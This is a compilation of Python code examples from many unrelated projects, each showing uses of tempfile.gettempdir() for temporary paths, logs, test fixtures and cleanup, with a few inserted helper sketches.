def setUp(self):
        # Base paths in the real and test file systems. We keep them different
        # so that missing features in the fake don't fall through to the base
        # operations and magically succeed.
        tsname = 'fakefs.%s' % time.time()
        # Fully expand the base_path - required on OS X.
        self.real_base = os.path.realpath(
                os.path.join(tempfile.gettempdir(), tsname))
        os.chdir(tempfile.gettempdir())
        if os.path.isdir(self.real_base):
            shutil.rmtree(self.real_base)
        os.mkdir(self.real_base)
        self.fake_base = self._FAKE_FS_BASE

        # Make sure we can write to the physical testing temp directory.
        self.assertTrue(os.access(self.real_base, os.W_OK))

        self.fake_filesystem = fake_filesystem.FakeFilesystem()
        self.fake_filesystem.CreateDirectory(self.fake_base)
        self.fake_os = fake_filesystem.FakeOsModule(self.fake_filesystem)
        self.fake_open = fake_filesystem.FakeFileOpen(self.fake_filesystem)
        self._created_files = []

        os.chdir(self.real_base)
        self.fake_os.chdir(self.fake_base)
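A matching tearDown is not part of this excerpt; a minimal sketch of the cleanup the setUp above implies (an assumption, not the original test code) could look like this:

def tearDown(self):
        # Sketch only: step out of the per-test directory and remove the
        # real (non-fake) base created in setUp.
        os.chdir(tempfile.gettempdir())
        shutil.rmtree(self.real_base, ignore_errors=True)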
Example #2
    def test_tmp_dir_normal_2(self):
        tempdir = tempfile.gettempdir()
        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])


        class WitnessException(Exception):
            pass

        @with_tempdir
        def createfile():
            fd1, fn1 = tempfile.mkstemp()
            fd2, fn2 = tempfile.mkstemp()
            dir = tempfile.mkdtemp()
            fd3, fn3 = tempfile.mkstemp(dir=dir)
            tempfile.mkdtemp()
            for fd in (fd1, fd2, fd3):
                os.close(fd)
            raise WitnessException()

        self.assertRaises(WitnessException, createfile)

        # assert tempdir didn't change
        self.assertEqual(tempfile.gettempdir(), tempdir)

        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])
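The with_tempdir decorator exercised here (and in test_tmp_dir_normal_1 further down) is not shown in this listing. A minimal sketch of such a decorator, assuming its contract is simply "run the wrapped callable with a private temp directory that is removed afterwards, even on exceptions":

import functools
import shutil
import tempfile


def with_tempdir(func):
    """Sketch: point the tempfile module at a private directory for the
    duration of ``func`` and clean that directory up afterwards."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        old_tempdir = tempfile.tempdir
        private_dir = tempfile.mkdtemp()
        tempfile.tempdir = private_dir
        try:
            return func(*args, **kwargs)
        finally:
            tempfile.tempdir = old_tempdir
            shutil.rmtree(private_dir, ignore_errors=True)
    return wrapper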
Example #3
    def __init__(self, icon, menu):
        if sys.platform=="linux2":
            self.menu = menu.gtk_menu
            import appindicator
            self.icon_directory = os.path.sep + 'usr' + os.path.sep+ 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            if not os.path.isdir(self.icon_directory):
                self.icon_directory = os.path.dirname(sys.argv[0]) + os.path.sep + 'share' + os.path.sep + 'icons' + os.path.sep + 'zik' + os.path.sep
            self.statusicon = appindicator.Indicator("new-parrotzik-indicator",
                                           "indicator-messages",
                                           appindicator.CATEGORY_APPLICATION_STATUS)
            self.statusicon.set_status(appindicator.STATUS_ACTIVE)
            self.statusicon.set_icon_theme_path(self.icon_directory)
            self.statusicon.set_menu(self.menu)          
            
        elif sys.platform=="win32":  
            self.menu = menu.gtk_menu          
            self.icon_directory = os.path.dirname(os.path.realpath(sys.argv[0])) + os.path.sep+ 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            self.statusicon = gtk.StatusIcon()            
            self.statusicon.connect("popup-menu", self.gtk_right_click_event)
            self.statusicon.set_tooltip("Parrot Zik")
            self.menu_shown=False
            sys.stdout = open(tempfile.gettempdir()+os.path.sep+"zik_tray_stdout.log", "w")
            sys.stderr = open(tempfile.gettempdir()+os.path.sep+"zik_tray_stderr.log", "w")    

        elif sys.platform=="darwin":
            self.icon_directory = os.path.dirname(os.path.realpath(sys.argv[0])) + os.path.sep+ 'share' + os.path.sep+'icons' + os.path.sep+'zik'+ os.path.sep
            self.statusicon = StatusApp.sharedApplication()
            self.statusicon.initMenu(menu)
        
        self.setIcon(icon)
Example #4
    def test_set_tmpdir(self):
        """Test set_tmpdir config function."""
        self.purge_environment()

        for tmpdir in [None, os.path.join(tempfile.gettempdir(), 'foo')]:
            parent = tmpdir
            if parent is None:
                parent = tempfile.gettempdir()

            mytmpdir = set_tmpdir(tmpdir=tmpdir)

            for var in ['TMPDIR', 'TEMP', 'TMP']:
                self.assertTrue(os.environ[var].startswith(os.path.join(parent, 'easybuild-')))
                self.assertEqual(os.environ[var], mytmpdir)
            self.assertTrue(tempfile.gettempdir().startswith(os.path.join(parent, 'easybuild-')))
            tempfile_tmpdir = tempfile.mkdtemp()
            self.assertTrue(tempfile_tmpdir.startswith(os.path.join(parent, 'easybuild-')))
            fd, tempfile_tmpfile = tempfile.mkstemp()
            self.assertTrue(tempfile_tmpfile.startswith(os.path.join(parent, 'easybuild-')))

            # cleanup
            os.close(fd)
            shutil.rmtree(mytmpdir)
            modify_env(os.environ, self.orig_environ)
            tempfile.tempdir = None
Example #5
    def test_tmp_dir_normal_1(self):
        tempdir = tempfile.gettempdir()
        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])

        witness = []

        @with_tempdir
        def createfile(list):
            fd1, fn1 = tempfile.mkstemp()
            fd2, fn2 = tempfile.mkstemp()
            dir = tempfile.mkdtemp()
            fd3, fn3 = tempfile.mkstemp(dir=dir)
            tempfile.mkdtemp()
            list.append(True)
            for fd in (fd1, fd2, fd3):
                os.close(fd)

        self.assertFalse(witness)
        createfile(witness)
        self.assertTrue(witness)

        self.assertEqual(tempfile.gettempdir(), tempdir)

        # assert temp directory is empty
        self.assertListEqual(list(os.walk(tempdir)),
            [(tempdir, [], [])])
Example #6
def captcha_audio(request, key):
    if settings.CAPTCHA_FLITE_PATH:
        try:
            store = CaptchaStore.objects.get(hashkey=key)
        except CaptchaStore.DoesNotExist:
            # HTTP 410 Gone status so that crawlers don't index these expired urls.
            return HttpResponse(status=410)

        text = store.challenge
        if 'captcha.helpers.math_challenge' == settings.CAPTCHA_CHALLENGE_FUNCT:
            text = text.replace('*', 'times').replace('-', 'minus').replace('+', 'plus')
        else:
            text = ', '.join(list(text))
        path = str(os.path.join(tempfile.gettempdir(), '%s.wav' % key))
        subprocess.call([settings.CAPTCHA_FLITE_PATH, "-t", text, "-o", path])

        # Add arbitrary noise if sox is installed
        if settings.CAPTCHA_SOX_PATH:
            arbnoisepath = str(os.path.join(tempfile.gettempdir(), '%s_arbitrary.wav') % key)
            mergedpath = str(os.path.join(tempfile.gettempdir(), '%s_merged.wav') % key)
            subprocess.call([settings.CAPTCHA_SOX_PATH, '-r', '8000', '-n', arbnoisepath, 'synth', '2', 'brownnoise', 'gain', '-15'])
            subprocess.call([settings.CAPTCHA_SOX_PATH, '-m', arbnoisepath, path, '-t', 'wavpcm', '-b', '16', mergedpath])
            os.remove(arbnoisepath)
            os.remove(path)
            os.rename(mergedpath, path)

        if os.path.isfile(path):
            response = RangedFileResponse(request, open(path, 'rb'), content_type='audio/wav')
            response['Content-Disposition'] = 'attachment; filename="{}.wav"'.format(key)
            return response
    raise Http404
Example #7
    def train_from_file(self, conll_file, verbose=False):
        """
        Train MaltParser from a file
        
        :param conll_file: str for the filename of the training input data
        """
        if not self._malt_bin:
            raise Exception("MaltParser location is not configured.  Call config_malt() first.")

        # If conll_file is a ZipFilePathPointer, then we need to do some extra massaging
        f = None
        if hasattr(conll_file, 'zipfile'):
            zip_conll_file = conll_file
            conll_file = os.path.join(tempfile.gettempdir(),'malt_train.conll')
            conll_str = zip_conll_file.open().read()
            f = open(conll_file,'w')
            f.write(conll_str)
            f.close()        

        cmd = ['java', '-jar %s' % self._malt_bin, '-w %s' % tempfile.gettempdir(), 
               '-c %s' % self.mco, '-i %s' % conll_file, '-m learn']
        
#        p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
#                             stderr=subprocess.STDOUT,
#                             stdin=subprocess.PIPE)
#        (stdout, stderr) = p.communicate()
                
        self._execute(cmd, 'train', verbose)
        
        self._trained = True
Example #8
    def exportAction(self):
        """
        Export Action
        """
        tempfile.gettempdir()
        base_url = self.exportSettings.server_url
        pack_name = self.exportSettings.pack
        export_dir = self.getExportDir()

        self.addStatus("Exporting to " + export_dir, IMMEDIATE)

        destfolder = os.path.join(export_dir, 'b2rx_export')
        if not os.path.exists(destfolder):
            os.makedirs(destfolder)
        else:
            shutil.rmtree(destfolder)
            os.makedirs(destfolder)

        x = self.exportSettings.locX.getValue()
        y = self.exportSettings.locY.getValue()
        z = self.exportSettings.locZ.getValue()

        self.export(destfolder, pack_name, [x, y, z], self.exportSettings)
        dest_file = os.path.join(export_dir, "world_pack.zip")
        self.packTo(destfolder, dest_file)

        self.addStatus("Exported to " + dest_file)
Example #9
 def processImage(self):
   """ starting with the original image, start processing each row """
   tier=(len(self._v_scaleInfo) -1)
   row = 0
   ul_y, lr_y = (0,0)
   root, ext = os.path.splitext(self._v_imageFilename)  
   if not root:
     root = self._v_imageFilename
   ext = '.jpg'
   while row * self.tileSize < self.originalHeight:
     ul_y = row * self.tileSize
     if (ul_y + self.tileSize) < self.originalHeight:
       lr_y = ul_y + self.tileSize
     else:
       lr_y = self.originalHeight
     image = self.openImage()
     imageRow = image.crop([0, ul_y, self.originalWidth, lr_y])
     saveFilename = root + str(tier) + '-' + str(row) +  ext
     if imageRow.mode != 'RGB':
       imageRow = imageRow.convert('RGB')
     imageRow.save(os.path.join(tempfile.gettempdir(), saveFilename), 'JPEG', quality=100)
     image = None
     imageRow = None
     if os.path.exists(os.path.join(tempfile.gettempdir(), saveFilename)): 
       self.processRowImage(tier=tier, row=row)
     row += 1
Example #10
def getTempFilePath(base, counter):
    # does not guarantee it is new, just converts this into the path
    tmp_dir = tempfile.gettempdir()
    base = "_15112_autograder_" + str(base) + "_"
    fileName = base + str(counter)
    filePath = os.path.join(tmp_dir, fileName)
    return filePath
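As the comment notes, getTempFilePath only builds a path and does not guarantee that the file is new. If a collision-free path is needed, tempfile.mkstemp could be used instead; a sketch, not part of the original autograder code:

import os
import tempfile


def makeUniqueTempFilePath(base, counter):
    # Sketch: let the OS pick a name that is guaranteed not to exist yet,
    # keeping a prefix similar to getTempFilePath().
    prefix = "_15112_autograder_" + str(base) + "_" + str(counter) + "_"
    fd, filePath = tempfile.mkstemp(prefix=prefix)
    os.close(fd)  # the caller reopens the file as needed
    return filePath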
Example #11
  def __init__(self, host_name="localhost", port=None, user_name=None, password=None,
      db_name=None, log_sql=False):
    self._host_name = host_name
    self._port = port or self.PORT
    self._user_name = user_name or self.USER_NAME
    self._password = password or self.PASSWORD
    self.db_name = db_name
    self._conn = None
    self._connect()

    if log_sql:
      with DbConnection.LOCK:
        sql_log_path = gettempdir() + '/sql_log_%s_%s.sql' \
              % (self.db_type.lower(), time())
        self.sql_log = open(sql_log_path, 'w')
        link = gettempdir() + '/sql_log_%s.sql' % self.db_type.lower()
        try:
          unlink(link)
        except OSError as e:
          if 'No such file' not in str(e):
            raise e
        try:
          symlink(sql_log_path, link)
        except OSError as e:
          raise e
    else:
      self.sql_log = None
Example #12
def mount(location, access='rw'):
    '''
    Mount an image

    CLI Example:

    .. code-block:: bash

        salt '*' guest.mount /srv/images/fedora.qcow
    '''
    root = os.path.join(
            tempfile.gettempdir(),
            'guest',
            location.lstrip(os.sep).replace('/', '.')
            )
    if not os.path.isdir(root):
        try:
            os.makedirs(root)
        except OSError:
            # somehow the directory already exists
            pass
    while True:
        if os.listdir(root):
            # Stuff is in there, don't use it
            rand = hashlib.md5(str(random.randint(1, 1000000))).hexdigest()
            root = os.path.join(
                tempfile.gettempdir(),
                'guest',
                location.lstrip(os.sep).replace('/', '.') + rand
                )
        else:
            break
    cmd = 'guestmount -i -a {0} --{1} {2}'.format(location, access, root)
    __salt__['cmd.run'](cmd)
    return root
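The while loop above probes for an unused directory by appending a random md5 suffix. Assuming any unique, empty mount root is acceptable, tempfile.mkdtemp gives a race-free equivalent; a sketch, not the Salt module's actual implementation:

import os
import tempfile


def _unique_mount_root(location):
    # Sketch: create a guaranteed-fresh, empty directory under
    # <tempdir>/guest to use as the guestmount mount point.
    base = os.path.join(tempfile.gettempdir(), 'guest')
    if not os.path.isdir(base):
        os.makedirs(base)
    prefix = location.lstrip(os.sep).replace('/', '.') + '.'
    return tempfile.mkdtemp(prefix=prefix, dir=base)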
Example #13
def remove_graph_viz_temporaries():
    """ remove_graph_viz_temporaries() -> None
    Removes temporary files generated by dot

    """
    os.unlink(tempfile.gettempdir() + "dot_output_vistrails.txt")
    os.unlink(tempfile.gettempdir() + "dot_tmp_vistrails.txt")
Example #14
def get_args_parser():
  """Creates the argument parser and adds the flags"""
  parser = argparse.ArgumentParser(
      description="Impala diagnostics collection",
      formatter_class=argparse.ArgumentDefaultsHelpFormatter)
  parser.add_argument("--pid", required=True, action="store", dest="pid", type=int,
      default=0, help="PID of the Impala process for which to collect diagnostics.")
  parser.add_argument("--java_home", action="store", dest="java_home", default="",
      help="If not set, it is set to the JAVA_HOME from the pid's environment.")
  parser.add_argument("--timeout", action="store", dest="timeout", default=300,
      type=int, help="Timeout (in seconds) for each of the diagnostics commands")
  parser.add_argument("--stacks", action="store", dest="stacks", nargs=2, type=int,
      default=[0, 0], metavar=("COUNT", "INTERVAL (in seconds)"),
      help="Collect jstack, mixed-mode jstack and pstacks of the Impala process.\
      Breakpad minidumps are collected in case of missing pstack binaries.")
  parser.add_argument("--jmap", action="store_true", dest="jmap", default=False,
      help="Collect heap dump of the Java process")
  parser.add_argument("--gcore", action="store_true", dest="gcore", default=False,
      help="Collect the native core dump using gdb. Requires gdb to be installed.")
  parser.add_argument("--minidumps", action="store", dest="minidumps", type=int,
      nargs=2, default=[0, 0], metavar=("COUNT", "INTERVAL (in seconds)"),
      help="Collect breakpad minidumps for the Impala process. Requires --minidumps_dir\
      be set.")
  parser.add_argument("--minidumps_dir", action="store", dest="minidumps_dir", default="",
      help="Path of the directory to which Impala process' minidumps are written")
  parser.add_argument("--profiles_dir", action="store", dest="profiles_dir", default="",
      help="Path of the profiles directory to be included in the diagnostics output.")
  parser.add_argument("--profiles_max_size_limit", action="store",
      dest="profiles_max_size_limit", default=3 * 1024 * 1024 * 1024, type=float,
      help="Uncompressed limit (in Bytes) on profile logs collected from --profiles_dir.")
  parser.add_argument("--output_dir", action="store", dest="output_dir",
      default = tempfile.gettempdir(), help="Output directory that contains the final "
      "diagnostics data. Defaults to %s" % tempfile.gettempdir())
  return parser
Example #15
def main():
  globs_to_delete = [
    # Clears run_isolated.zip.
    'run_isolated.zip',

    # Clears temporary directories generated by run_isolated.py.
    'run_tha_test*',
    'isolated_out*',

    # Clears temporary directories generated by Chromium tests.
    # TODO(maruel): This doesn't belong here, I wish these tests stopped
    # leaking.
    os.path.join(tempfile.gettempdir(), 'scoped_dir*'),
    os.path.join(tempfile.gettempdir(), 'zip_package*'),
  ]
  if sys.platform == 'win32':
    globs_to_delete.append(
        os.path.join(
            os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft',
            'Windows', 'Recent', 'CustomDestinations', '*'))

  iterables = (glob.iglob(g) for g in globs_to_delete)
  for filename in itertools.chain.from_iterable(iterables):
    delete(filename)

  print ''
  return 0
Example #16
    def test_source_escaping2(self):
        def create_test_db(dbfile):
            if os.path.exists(dbfile):
                os.remove(dbfile)
            con = spatialite_connect(dbfile)
            cur = con.cursor()
            cur.execute("SELECT InitSpatialMetadata(1)")
            cur.execute("CREATE TABLE test (id INTEGER, name TEXT)")
            cur.execute("SELECT AddGeometryColumn('test', 'geometry', 4326, 'POINT', 'XY')")
            sql = "INSERT INTO test (id, name, geometry) "
            sql += "VALUES (1, 'toto',GeomFromText('POINT(0 0)',4326))"
            cur.execute(sql)
            con.close()

        # the source contains ',' and single quotes
        fn = os.path.join(tempfile.gettempdir(), "test,.db")
        create_test_db(fn)
        source = "dbname='%s' table=\"test\" (geometry) sql=" % fn
        d = QgsVirtualLayerDefinition()
        d.addSource("t", source, "spatialite")
        l = QgsVectorLayer(d.toString(), "vtab", "virtual", False)
        self.assertEqual(l.isValid(), True)

        # the source contains ':' and single quotes
        fn = os.path.join(tempfile.gettempdir(), "test:.db")
        create_test_db(fn)
        source = "dbname='%s' table=\"test\" (geometry) sql=" % fn
        d = QgsVirtualLayerDefinition()
        d.addSource("t", source, "spatialite")
        l = QgsVectorLayer(d.toString(), "vtab", "virtual", False)
        self.assertEqual(l.isValid(), True)
Example #17
  def __init__(self, cursors, sql_writers, query_timeout_seconds):
    '''cursors should be a list of db_connector.Cursors.

       sql_writers should be a list of model_translator.SqlWriters, with translators in
       the same order as cursors in "cursors".
    '''
    self.query_timeout_seconds = query_timeout_seconds
    self.cursors = cursors
    self.sql_writers = sql_writers
    self.query_logs = list()


    for cursor in cursors:
      # A list of all queries attempted
      query_log_path = gettempdir() + '/test_query_log_%s_%s.sql' \
          % (cursor.connection.db_type.lower(), time())
      self.query_logs.append(open(query_log_path, 'w'))
      link = gettempdir() + '/test_query_log_%s.sql' % cursor.connection.db_type.lower()
      try:
        unlink(link)
      except OSError as e:
        if 'No such file' not in str(e):
          raise e
      try:
        symlink(query_log_path, link)
      except OSError as e:
        # TODO: Figure out what the error message is where there is a race condition
        #       and ignore it.
        raise e

    # In case the query will be executed as a "CREATE TABLE <name> AS ..." or
    # "CREATE VIEW <name> AS ...", this will be the value of "<name>".
    self._table_or_view_name = None
Example #18
    def _geo_img_diff(self, image_1, image_2):
        if os.name == 'nt':
            # Not supported on Windows due to #13061
            return 0

        with open(os.path.join(tempfile.gettempdir(), image_2), "wb") as f:
            f.write(image_1)
        image_1 = gdal.Open(os.path.join(tempfile.gettempdir(), image_2), GA_ReadOnly)
        assert image_1, "No output image written: " + image_2

        image_2 = gdal.Open(os.path.join(self.testdata_path, "results", image_2), GA_ReadOnly)
        assert image_1, "No expected image found:" + image_2

        if image_1.RasterXSize != image_2.RasterXSize or image_1.RasterYSize != image_2.RasterYSize:
            image_1 = None
            image_2 = None
            return 1000  # wrong size

        square_sum = 0
        for x in range(image_1.RasterXSize):
            for y in range(image_1.RasterYSize):
                square_sum += (image_1.ReadAsArray()[x][y] - image_2.ReadAsArray()[x][y]) ** 2

        # Explicitly close GDAL datasets
        image_1 = None
        image_2 = None
        return sqrt(square_sum)
Example #19
def create_logger(module):
    """ Creates a logger and spits out result into a temp file that is named accordinly
    Args:
        module (str): module name
    Returns (logging.logger)
    Usage:
        create_logger('test')
    """
    logger = logging.getLogger("variableFK")
    filename = "log_%s.txt" % module

    if logger.handlers:
        logger.handlers = []
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")

    fh = logging.FileHandler(os.path.join(tempfile.gettempdir(), filename))
    open(os.path.join(tempfile.gettempdir(), filename), "w").close()

    fh.setLevel(logging.DEBUG)
    fh.setFormatter(formatter)

    logger.addHandler(fh)

    return logger
Example #20
    def test_multi_proc(self):
        json_conf = configurator.to_json(None)
        json_conf["pick"]["run_options"]["procs"] = 2
        json_conf["pick"]["files"]["input"] = pkg_resources.resource_filename("Mikado.tests",
                                                                              "mikado_prepared.gtf")
        json_conf["pick"]["files"]["output_dir"] = tempfile.gettempdir()
        json_conf["pick"]["files"]["loci_out"] = "mikado.multiproc.loci.gff3"
        json_conf["pick"]["files"]["subloci_out"] = "mikado.multiproc.subloci.gff3"
        json_conf["pick"]["files"]["monoloci_out"] = "mikado.multiproc.monoloci.gff3"
        json_conf["pick"]["files"]["log"] = "mikado.multiproc.log"
        json_conf["db_settings"]["db"] = pkg_resources.resource_filename("Mikado.tests", "mikado.db")
        json_conf["log_settings"]["log_level"] = "WARNING"

        pick_caller = picker.Picker(json_conf=json_conf)
        with self.assertRaises(SystemExit), self.assertLogs("main_logger", "INFO"):
            pick_caller()
        self.assertTrue(os.path.exists(os.path.join(tempfile.gettempdir(), "mikado.multiproc.loci.gff3")))
        with to_gff(os.path.join(tempfile.gettempdir(), "mikado.multiproc.loci.gff3")) as inp_gff:
            lines = [_ for _ in inp_gff if _.header is not True]
            self.assertGreater(len(lines), 0)
            self.assertGreater(len([_ for _ in lines if _.is_transcript is True]), 0)
            self.assertGreater(len([_ for _ in lines if _.feature == "mRNA"]), 0)
            self.assertGreater(len([_ for _ in lines if _.feature == "CDS"]), 0)

        [os.remove(_) for _ in glob.glob(os.path.join(tempfile.gettempdir(), "mikado.multiproc.") + "*")]
Example #21
def run_experiments():
    logging.basicConfig(level = logging.INFO)

    logfolder = os.path.join(tempfile.gettempdir(), TEMPDIR, 'logs')
    pathfolder = os.path.join(tempfile.gettempdir(), TEMPDIR, 'hdf5')


    exponents = np.arange(0, 8, 1)
    res_per_run = 100
    traj_names = []
    filenames = []
    runs = (np.ones(len(exponents))*2) ** exponents
    for adx, nruns in enumerate(runs):
        env = Environment(log_folder=logfolder, filename=pathfolder,
                          ncores=2, multiproc=True,
                          use_pool=True,
                          wrap_mode='QUEUE')

        traj = env.v_trajectory

        traj.f_add_parameter('res_per_run', res_per_run)
        traj.f_add_parameter('trial', 0)

        traj.f_explore({'trial': list(range(int(nruns)))})


        env.f_run(add_data)

        traj_names.append(traj.v_name)
        filenames.append(traj.v_storage_service.filename)

    return filenames, traj_names, pathfolder
Example #22
 def processImage(self):
     """ starting with the original image, start processing each row """
     tier = len(self._v_scaleInfo) - 1
     row = 0
     ul_y, lr_y = (0, 0)
     root, ext = os.path.splitext(self._v_imageFilename)
     if not root:
         root = self._v_imageFilename
     ext = ".jpg"
     image = self.openImage()
     while row * self.tileSize < self.originalHeight:
         ul_y = row * self.tileSize
         if (ul_y + self.tileSize) < self.originalHeight:
             lr_y = ul_y + self.tileSize
         else:
             lr_y = self.originalHeight
         print "Going to open image"
         imageRow = image.crop([0, ul_y, self.originalWidth, lr_y])
         saveFilename = root + str(tier) + "-" + str(row) + ext
         if imageRow.mode != "RGB":
             imageRow = imageRow.convert("RGB")
         imageRow.save(os.path.join(tempfile.gettempdir(), saveFilename), "JPEG", quality=100)
         print "os path exist : %r" % os.path.exists(os.path.join(tempfile.gettempdir(), saveFilename))
         if os.path.exists(os.path.join(tempfile.gettempdir(), saveFilename)):
             self.processRowImage(tier=tier, row=row)
         row += 1
Example #23
def _create_db_tables_and_add_users():
    ctx.logger.info('Creating SQL tables and adding admin users...')
    create_script_path = 'components/restservice/config' \
                         '/create_tables_and_add_users.py'
    create_script_destination = join(tempfile.gettempdir(),
                                     'create_tables_and_add_users.py')
    ctx.download_resource(source=create_script_path,
                          destination=create_script_destination)
    # Directly calling with this python bin, in order to make sure it's run
    # in the correct venv
    python_path = '{0}/env/bin/python'.format(REST_SERVICE_HOME)
    runtime_props = ctx.instance.runtime_properties

    args_dict = json.loads(runtime_props['security_configuration'])
    args_dict['postgresql_host'] = runtime_props['postgresql_host']

    # The script won't have access to the ctx, so we dump the relevant args
    # to a JSON file, and pass its path to the script
    args_file_location = join(tempfile.gettempdir(), 'security_config.json')
    with open(args_file_location, 'w') as f:
        json.dump(args_dict, f)

    result = utils.sudo(
        [python_path, create_script_destination, args_file_location]
    )

    _log_results(result)
    utils.remove(args_file_location)
Example #24
def main():
	
	parser = argparse.ArgumentParser()
	parser.add_argument("--file", help="Target file for the compressed Build")
	parser.add_argument("--config", help="Select the configuration", default="Release")
	args = parser.parse_args()

	print(args.file)
	print(args.config)
	print(tempfile.gettempdir())

	prodbg_path = os.path.join(tempfile.gettempdir(), "prodbg")

	if (os.path.isdir(prodbg_path)):
		shutil.rmtree(prodbg_path)
	
	os.makedirs(prodbg_path)

	config_path = getConfigPath(args.config)

	# copy all the data to the temporary directory

	copyDir(prodbg_path, os.path.join(config_path), ('*.pdb', '*.obj', '*.ilk', '*.lib', '*.exp', '*.exe')) 
	copyDir(prodbg_path, "temp", None) 
	copyDir(prodbg_path, "data", None) 
	copyFile(prodbg_path, os.path.join(config_path, "prodbg.exe"))

	# Compress to zip file

	zipBuild(args.file, prodbg_path)
Example #25
def unzip(fhash,filename):
	(prefix, sep, suffix) = filename.rpartition('.')
	if remove_directory:
		prefix = directory+"/"+os.path.basename(prefix);
	found = 0;
	try:
		with zipfile.ZipFile(tempfile.gettempdir()+"/"+fhash+".zip") as zf:
			for member in zf.infolist():
				words = member.filename.split('/')
				path = "./"

				for word in words[:-1]:
					drive, word = os.path.splitdrive(word);
					head, word = os.path.split(word);
					if word in (os.curdir, os.pardir, ''): continue
					path = os.path.join(path, word);

				if re.match(r".*[.](srt|sub|ass)$",words[0].lower()) != None:
					zf.extract(member, tempfile.gettempdir()+"/");
					shutil.move(tempfile.gettempdir()+"/"+words[0], prefix+"."+(re.findall(r".*[.](srt|sub|ass)$",words[0].lower())[0]));
					if removeAd:
						adBlock(prefix+"."+(re.findall(r".*[.](srt|sub|ass)$",words[0].lower())[0]));
					found += 1;

	except zipfile.BadZipfile:
		os.unlink(tempfile.gettempdir()+"/"+fhash+".zip");
		raise Exception("Can't extract subtitles from downloaded file.")

	if found == 0:
		os.unlink(tempfile.gettempdir()+"/"+fhash+".zip");
		raise Exception("Subtitle file not found in archive.")
Example #26
def pre_start_restore():
  """
  Restores the flume config, config dir, file/spillable channels to their proper locations
  after an upgrade has completed.
  :return:
  """
  Logger.info('Restoring Flume data and configuration after upgrade...')
  directoryMappings = _get_directory_mappings()

  for directory in directoryMappings:
    archive = os.path.join(tempfile.gettempdir(), BACKUP_TEMP_DIR,
      directoryMappings[directory])

    if os.path.isfile(archive):
      Logger.info('Extracting {0} to {1}'.format(archive, directory))
      tarball = None
      try:
        tarball = tarfile.open(archive, "r")
        tarball.extractall(directory)
      finally:
        if tarball:
          tarball.close()

    # cleanup
    if os.path.exists(os.path.join(tempfile.gettempdir(), BACKUP_TEMP_DIR)):
      shutil.rmtree(os.path.join(tempfile.gettempdir(), BACKUP_TEMP_DIR))
Example #27
    def setUp(self):

        def createlayer(driver):
            lyr = driver.CreateLayer("edges", None, ogr.wkbLineString)
            namedef = ogr.FieldDefn("Name", ogr.OFTString)
            namedef.SetWidth(32)
            lyr.CreateField(namedef)
            return lyr

        drv = ogr.GetDriverByName("ESRI Shapefile")

        testdir = os.path.join(tempfile.gettempdir(),'shpdir')
        shppath = os.path.join(tempfile.gettempdir(),'tmpshp.shp')

        self.deletetmp(drv, testdir, shppath)
        os.mkdir(testdir)

        shp = drv.CreateDataSource(shppath)
        lyr = createlayer(shp)
        self.names = ['a','b','c']  #edgenames
        self.paths = (  [(1.0, 1.0), (2.0, 2.0)],
                        [(2.0, 2.0), (3.0, 3.0)],
                        [(0.9, 0.9), (4.0, 2.0)]
                    )
        for path,name in zip(self.paths, self.names):
            feat = ogr.Feature(lyr.GetLayerDefn())
            g = ogr.Geometry(ogr.wkbLineString)
            for xy in path:
                g.AddPoint_2D(*xy)
            feat.SetGeometry(g)
            feat.SetField("Name", name)
            lyr.CreateFeature(feat)
        self.shppath = shppath
        self.testdir = testdir
        self.drv = drv
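The setUp above calls self.deletetmp, which is defined elsewhere in the test class. A minimal sketch of what it presumably does, matching the call deletetmp(drv, testdir, shppath) and assuming os and shutil are imported in the test module (an assumption, not the project's actual helper):

    def deletetmp(self, drv, *paths):
        # Sketch: remove leftovers from a previous run, ignoring paths that
        # do not exist. Directories are removed directly; OGR data sources
        # are deleted through the driver.
        for p in paths:
            if not os.path.exists(p):
                continue
            if os.path.isdir(p):
                shutil.rmtree(p)
            else:
                drv.DeleteDataSource(p)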
Example #28
  def testUnzipFileContainingLongPath(self):
    try:
      dir_path = self.tmp_dir
      if sys.platform.startswith('win'):
        dir_path = u'\\\\?\\' + dir_path

      archive_suffix = ''
      # 260 is the Windows API path length limit.
      while len(archive_suffix) < 260:
        archive_suffix = os.path.join(archive_suffix, 'really')
      contents_dir_path = os.path.join(dir_path, archive_suffix)
      os.makedirs(contents_dir_path)
      filename = os.path.join(contents_dir_path, 'longpath.txt')
      open(filename, 'a').close()

      base_path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
      archive_path = shutil.make_archive(base_path, 'zip', dir_path)
      self.assertTrue(os.path.exists(archive_path))
      self.assertTrue(zipfile.is_zipfile(archive_path))
    except:
      if os.path.isfile(archive_path):
        os.remove(archive_path)
      raise

    unzip_path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
    dependency_manager_util.UnzipArchive(archive_path, unzip_path)
    dependency_manager_util.RemoveDir(unzip_path)
Example #29
def trim_any_leftovers():
    print tempfile.gettempdir()
    leftovers = glob.glob(os.path.join(tempfile.gettempdir(), 'mcworld_*', ''))
    for d in leftovers:
        print "Found left over directory: {}".format(d)
        if DO_REMOVE:
            shutil.rmtree(d, ignore_errors=True)
Example #30
    def test_index(self):

        # Create the list of files
        files = ["trinity.gtf",
                 "trinity.gff3",
                 "trinity.cDNA_match.gff3",
                 "trinity.match_matchpart.gff3"]
        # files = [pkg_resources.resource_filename("Mikado.tests", filename) for filename in files]

        namespace = Namespace(default=False)
        namespace.distance = 2000
        namespace.index = True
        namespace.prediction = None
        namespace.log = os.path.join(tempfile.gettempdir(), "index.log")
        logger = create_null_logger("null")

        for ref in files:
            with self.subTest(ref=ref):
                temp_ref = os.path.join(tempfile.gettempdir(), ref)
                with pkg_resources.resource_stream("Mikado.tests", ref) as ref_handle,\
                        open(temp_ref, "wb") as out_handle:
                    out_handle.write(ref_handle.read())
                namespace.reference = to_gff(temp_ref)
                compare(namespace)

                self.assertTrue(os.path.exists(namespace.log))
                self.assertTrue(os.path.exists("{}.midx".format(namespace.reference.name)))
                self.assertGreater(os.stat("{}.midx".format(namespace.reference.name)).st_size, 0)
